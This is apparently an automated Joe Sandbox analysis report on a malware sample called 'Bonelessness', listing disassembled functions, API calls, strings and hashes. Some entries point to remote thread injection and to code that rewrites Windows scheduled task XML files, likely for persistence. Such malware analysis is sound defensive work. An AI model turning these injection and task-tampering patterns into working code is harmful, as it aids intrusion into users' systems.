RtlCreateUserThread.NTDLL ref: 00401DA0
GetHandleInformation.KERNEL32(00000000), ref: 00401DBC
CloseHandle.KERNEL32(00000000), ref: 00401DCD

Strings

kernel32.dll, xrefs: 00401BCF, 00401C0C
IsWow64Process, xrefs: 00401BEB, 00401C22

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
String ID: IsWow64Process$kernel32.dll
API String ID: 3542510048-3024904723
Opcode ID: ba5e8482ce6558dcd48eb70727eb2832cdeee386e3baf9961ddfede8c17bb47e
Instruction ID: 1cc1a5b9d3a24803e7d074aebc255e1873ec8508329ddbed26f29eb15fe00603
Opcode Fuzzy Hash: ba5e8482ce6558dcd48eb70727eb2832cdeee386e3baf9961ddfede8c17bb47e
Instruction Fuzzy Hash: 8E71A2B1640215ABE710DF94DD89FAF77B8AF84701F144029FA01B72D1D7B8A941C7A8

Function 00403310 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 00403337
GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403359
OpenProcessToken.ADVAPI32(00000000), ref: 00403360
GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403381
CloseHandle.KERNEL32(00000000), ref: 00403397

Strings

\\?\globalroot\systemroot\system32\tasks\, xrefs: 00403319

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
String ID: \\?\globalroot\systemroot\system32\tasks\
API String ID: 4133869067-1576788796
Opcode ID: 76f7c13d41ba4f40b5ff24f9cac2bfcc18b58a5216b2a1f5173a808488ca33cd
Instruction ID: 49b559ea0f9bb78937d1c0884117093763843d0ff56e3b8f35a0dc65749093db
Opcode Fuzzy Hash: 76f7c13d41ba4f40b5ff24f9cac2bfcc18b58a5216b2a1f5173a808488ca33cd
Instruction Fuzzy Hash: E60165B5A00208EBEB20DFA4DD4DB9F7B7CAB44715F0080A6EA05B2280DA749B44DF64

Function 0043A1C0 Relevance: 1.6, Strings: 1, Instructions: 320COMMON

Download Yara Rule

Strings

VUUU, xrefs: 0043A486

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID: VUUU
API String ID: 0-2040033107
Opcode ID: 91a8ad65bccbbfe05e08020613915b6b43463005f411ac20db4209ee28307917
Instruction ID: f47a8ee1f73e22a4fe4d0782bb31250b05cbd8abf37275be656dc7776c70eb81
Opcode Fuzzy Hash: 91a8ad65bccbbfe05e08020613915b6b43463005f411ac20db4209ee28307917
Instruction Fuzzy Hash: 43C13671A4065657C728CF69C9802BAFBF2BF58310F08A26EE4D2C6B81E23CF594C755

Function 00423460 Relevance: .8, Instructions: 833COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 078465a8c5f966f900ef0431eae93261a578a5e790f795112f798ddb2a924d92
Instruction ID: fb4bf73fbd96ce767e3e4ced4cff5850fb0c5de91f2901caa32f86ddb58664f3
Opcode Fuzzy Hash: 078465a8c5f966f900ef0431eae93261a578a5e790f795112f798ddb2a924d92
Instruction Fuzzy Hash: DC6266302083669FD711DF748998AAB7BF4EF8B342F448559E481C7322EB39C949C799

Function 00435230 Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5036dd47c7d37404f61d9253acab986b19dacab9ed83d46aeccfe24d09195b14
Instruction ID: 85909a87914b4e267680ae93a060971746addf1db64755a8a3bc2181f2046f0f
Opcode Fuzzy Hash: 5036dd47c7d37404f61d9253acab986b19dacab9ed83d46aeccfe24d09195b14
Instruction Fuzzy Hash: 5F42E0719006499FDB24DFA8C880BEFBBF5AF4C304F14555EE446A7342D778A942CBA8

Function 00445C60 Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00ffc4eb06bca0d5c3d9a2dea77500c2ca13b45209916c823031000f489548c1
Instruction ID: 85a937299a81f3d9309945d58e9e442e46b363752c2a3cd2ae91a7182d9b7112
Opcode Fuzzy Hash: 00ffc4eb06bca0d5c3d9a2dea77500c2ca13b45209916c823031000f489548c1
Instruction Fuzzy Hash: 0A120630A05B449FEB21CF18C5806AEBBF1FF46310F14859AE4A68B392C339ED46CB55

Function 00446330 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f797997eb54f774182d1461cf03963e7959118e080bee31629b5adcb6e64841a
Instruction ID: 46b84cad4234f5ce45083a22f3b7837f8dbab4e6c9ff07cf73690a7c3839c88d
Opcode Fuzzy Hash: f797997eb54f774182d1461cf03963e7959118e080bee31629b5adcb6e64841a
Instruction Fuzzy Hash: 8412F4309057849FEB25CF18C490AAABBF1BF53314F15859EE8A54B391C338E946CB56

Function 00445590 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4287607630ae20b9aa5277460d30b0afbc744c63664bd41df3638ca158418c96
Instruction ID: e557182fb19255dd362c8294d5405afe168e67028f96bc1afb08ac6ffecb48eb
Opcode Fuzzy Hash: 4287607630ae20b9aa5277460d30b0afbc744c63664bd41df3638ca158418c96
Instruction Fuzzy Hash: F512D130A05B459FEF21CF18C590AAEB7F2FF55310F14856AE8A65B392C738AD42CB54

Function 00444300 Relevance: .5, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a1b91ede640c16b6eb738e208c258cded16843dd2e2204d56f86606c58ff67d
Instruction ID: 6a0df0345f276ddaee371dcc3f576922ba37433c1e1455ba353acb30c9ea1d0b
Opcode Fuzzy Hash: 8a1b91ede640c16b6eb738e208c258cded16843dd2e2204d56f86606c58ff67d
Instruction Fuzzy Hash: 9612D534A057859FEB21CF18C58079EBBF1BF96710F14859AE8A58B381C338ED46CB65

Function 00442B10 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 873571734b46908c23de2a9ae6b9989397ee1cde3a23e753d5dfb42290629ecf
Instruction ID: 55551379100cdf018b1de4a285b7f8ac93436360615d4dad2d0621f8c6cf7646
Opcode Fuzzy Hash: 873571734b46908c23de2a9ae6b9989397ee1cde3a23e753d5dfb42290629ecf
Instruction Fuzzy Hash: BA021430A017459FEB24CF18C580AAFB7F1FF41310F54855AE8A58B391D379AD46CBA4

Function 00441EB0 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55246aaccc6255ecd0cb00e4f85a6f18806050463415470c8e688bca06ee7ecd
Instruction ID: cc554ed878a3e3a83374983980d7ee594483d7f74ccf43b721c7f55668250d4c
Opcode Fuzzy Hash: 55246aaccc6255ecd0cb00e4f85a6f18806050463415470c8e688bca06ee7ecd
Instruction Fuzzy Hash: 79020630A017459FEB24CF28C5806AFB7F1FF41310F54819AE8A58B391D7B8AD86C7A5

Function 00443770 Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c265ff65fe4c7ddf80da19a666888597f66043daa1ae6aea08b2ec6ac2f3f707
Instruction ID: 2a274e8a1ad40154ec6af4747db823c3f994c06c50863bccb78ad997ff61118a
Opcode Fuzzy Hash: c265ff65fe4c7ddf80da19a666888597f66043daa1ae6aea08b2ec6ac2f3f707
Instruction Fuzzy Hash: AC021530A017459FEB20CF18C490AAEB7F1FF41B11F18815AE8E59B391D339AE46CB94

Function 00441240 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6df987b23289ee04ce400f9caf8f2ac37f746e7da7383059cc081eab776726bd
Instruction ID: e8756846642be90abbdebc3e51230c0e069d03c092d075b54a71e7ce150ad093
Opcode Fuzzy Hash: 6df987b23289ee04ce400f9caf8f2ac37f746e7da7383059cc081eab776726bd
Instruction Fuzzy Hash: B702E730A057459FEB20CF18C580AAFB7F1FF91310F18855AE8A68B3A1D738AD82C755

Function 004090E0 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51d55618cfcce28e29bf9ce08806a72b0a8a1c959ef3e02c3131e7ed5490ce38
Instruction ID: 2f667d1f173bafce8e1427c15ece2f47d9d4cf61a284c9476ac3f855bb14d006
Opcode Fuzzy Hash: 51d55618cfcce28e29bf9ce08806a72b0a8a1c959ef3e02c3131e7ed5490ce38
Instruction Fuzzy Hash: 56F19D71A0021AABDB10CF59D984BAFB7B4FF89314F10416AED05AB382D779DD41CBA4

Function 0043A7A0 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc633f8a66651507d519b18302154a8b56194e6f441ade08eecc1b0582a71b74
Instruction ID: 9c2bf2eb3bc8d3effd0330e87da942dcbd05d366be1e22ae6a96fd6cb05b729e
Opcode Fuzzy Hash: bc633f8a66651507d519b18302154a8b56194e6f441ade08eecc1b0582a71b74
Instruction Fuzzy Hash: F2123971E002198FCF08CF99C9906ADFBF2BF88314F18916AD899AB754D738A951CB54

Function 004403F0 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42139abc3ffd798a773c451483f9a31d36512b6a1ddc4dab2380ab3743eb7a2d
Instruction ID: c261eb99067101d40d0f18de06a2b3948b1c8e435b3aa0119f3931cf21f67512
Opcode Fuzzy Hash: 42139abc3ffd798a773c451483f9a31d36512b6a1ddc4dab2380ab3743eb7a2d
Instruction Fuzzy Hash: 79E12930A057459FFB25CF28C4906AEBBE1FF92310F1481AFD5E64B391C239A856CB55

Function 0044A410 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a28db560a375c6abcebf6c3ee7d3ff37af9ee48000ecd15332263634e69ec2
Instruction ID: 3a9d95ed390408800039c1f3849d26610303243ba5ea242cbb4dce25a4e3c13c
Opcode Fuzzy Hash: 07a28db560a375c6abcebf6c3ee7d3ff37af9ee48000ecd15332263634e69ec2
Instruction Fuzzy Hash: 18E10430E046558FDB08CF68C5806ADBBF2EF89310F28C1AED895DB342D639DA46CB55

Function 0043BC40 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d418897d6c6a607d9eedbaecd746079996b30e4215d991710b5601b1c0f57d78
Instruction ID: 5a37b0648728958f0288bb4f7ac6d4aba95f21994ba20fc5e025a7a006478983
Opcode Fuzzy Hash: d418897d6c6a607d9eedbaecd746079996b30e4215d991710b5601b1c0f57d78
Instruction Fuzzy Hash: CDD14772E0021A8FCB18CF99C9816EEFBB2FF98310F15912AD955AB744D734A901CF94

Function 00406B60 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c780ae43a90426060a3544af387a16ad49e5268ea46b211455b66f1143b4994
Instruction ID: 9376e5c992562f3e00e2254617bc072180117d3474245450927de628b66f820d
Opcode Fuzzy Hash: 8c780ae43a90426060a3544af387a16ad49e5268ea46b211455b66f1143b4994
Instruction Fuzzy Hash: 8D814171D01215AFDB50EFA5C841B9EB7B5AF48314F26847EE805B7381D738AD11CBA8

Function 0043C780 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
Instruction ID: 52b51f466a7fff8df6a645b0fc373324c6dabd8578bc889902f10df3be222477
Opcode Fuzzy Hash: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
Instruction Fuzzy Hash: D951C433F215214BF348EA7ACC8415A73D3EBCA31075AC23AD901DB395E974E96396C4

Function 0040EA40 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7903d2f27aa9249a91df88b3081f7ec253c2a7590132b0b29ce9056827596fcf
Instruction ID: 1e85c0a7481e4e4fd660c7700b1cffa9ef74280aecd845eca65ecbbee168b463
Opcode Fuzzy Hash: 7903d2f27aa9249a91df88b3081f7ec253c2a7590132b0b29ce9056827596fcf
Instruction Fuzzy Hash: A8518C7190C3918BD311CF2AC48066BBBE1AFDA314F044E6EF8C4A7351D7799A498B96

Function 0043C5A0 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
Instruction ID: 233641ecc840252a1fc0e28f7a8495337fee8d5f73a79ec8e34192ffb94c1fa4
Opcode Fuzzy Hash: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
Instruction Fuzzy Hash: 9F41C277E51A3947F3188949CD81744AA52ABCC324F2B83B5CD2C6B356D8B9ED039AD0

Function 0040EC60 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 677ccf3ef613ba1445ea4e47055c97133223e5db12119d95f35b79f51fc9afce
Instruction ID: 982f5cbd81f6543f6bfa01c041187c3b3289f829b31c426caf68f299339906e7
Opcode Fuzzy Hash: 677ccf3ef613ba1445ea4e47055c97133223e5db12119d95f35b79f51fc9afce
Instruction Fuzzy Hash: D851C27150C3A28BD311CF2AC48466BBBE1AFD9314F084E6EE8D497351D378DA49CB96

Function 0042E6E0 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e70f0b26bb4a857cbc1470cafd2cc077ff3004965e96456ca00bb8093ff93c1
Instruction ID: aa575491994ff2620d76e793d25d9d15f22605b549845f0db131f6ffb0de12b4
Opcode Fuzzy Hash: 9e70f0b26bb4a857cbc1470cafd2cc077ff3004965e96456ca00bb8093ff93c1
Instruction Fuzzy Hash: CC217C339B44BB02E7508E728C8463277E3DFCB606FAF85B6D648C7652D23DD4029124

Function 00414540 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
Instruction ID: d8bd486f3b2b5881354ed63866940f8bb74c1bb7b7e3e17938e3daae00a15605
Opcode Fuzzy Hash: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
Instruction Fuzzy Hash: 3801C93B074E0E638519411C5024AFA11425B9279A7D4062BABCBD83D1EFCDD8D7D04F

Function 00413DA0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0dfc14e31f44cf4e014f2097966a418c44037349c65fa29245ceabfdf450b4f
Instruction ID: aaf8394e51d366f1cbaff26a72c6c9576496a1c1027a8e2768253c57e0b02b0d
Opcode Fuzzy Hash: c0dfc14e31f44cf4e014f2097966a418c44037349c65fa29245ceabfdf450b4f
Instruction Fuzzy Hash: 4C01F2B19043289FEB20CF54D88579ABBB4FB01304F40809DE98D93280C3B51A94CB96

Function 00406800 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40

Function 004034E9 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 292memoryfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040351B
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 00403567
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040356E
memset.MSVCRT ref: 00403586
_snwprintf.MSVCRT ref: 004035A0
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004035C3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004035DA
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004035EE
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403643
wcsstr.MSVCRT ref: 00403662
wcsstr.MSVCRT ref: 00403695
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040372B
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040375C
SetEndOfFile.KERNEL32(00000000), ref: 00403763
CloseHandle.KERNEL32(00000000), ref: 0040376A
VariantInit.OLEAUT32(00000000), ref: 0040379B
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F7
HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004037FA
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403807
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040380A
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040381D
HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403820
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040382D
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403830

Strings

p=<u, xrefs: 0040379B
<Actions , xrefs: 0040365A
00-->, xrefs: 0040368F

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
String ID: 00-->$<Actions $p=<u
API String ID: 3028510665-3770785300
Opcode ID: 03d92ed9c350a22cff9bf3ba1b65dc31ee79c9631ebe11a42a2e6577e904a005
Instruction ID: 013638ac99e31dc1b3f0b1cbc1bcbf050739cfec6944e8e6b412d7e6261d8edc
Opcode Fuzzy Hash: 03d92ed9c350a22cff9bf3ba1b65dc31ee79c9631ebe11a42a2e6577e904a005
Instruction Fuzzy Hash: 32A1C0B1500311ABC720DF64CC49F5B7BA8EFC8751F048A69FA49A7391D774EA04CBA4

Function 00402EA0 Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 436commemoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,?,?), ref: 00402EB0
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00402ED0
CoCreateInstance.OLE32(004043E8,00000000,00000001,004041D8,?), ref: 00402EF7
VariantInit.OLEAUT32(?), ref: 00402F0F
VariantInit.OLEAUT32(?), ref: 00402F2A
VariantInit.OLEAUT32(?), ref: 00402F48
VariantInit.OLEAUT32(?), ref: 00402F66
VariantClear.OLEAUT32(?), ref: 00402FEC
VariantClear.OLEAUT32(?), ref: 00402FF2
VariantClear.OLEAUT32(?), ref: 00402FF8
VariantClear.OLEAUT32(?), ref: 00402FFE
InterlockedDecrement.KERNEL32(.5@), ref: 0040303D
SysAllocString.OLEAUT32(00404F3C), ref: 004031E6
VariantInit.OLEAUT32(?), ref: 0040320B
VariantInit.OLEAUT32(?), ref: 00403229

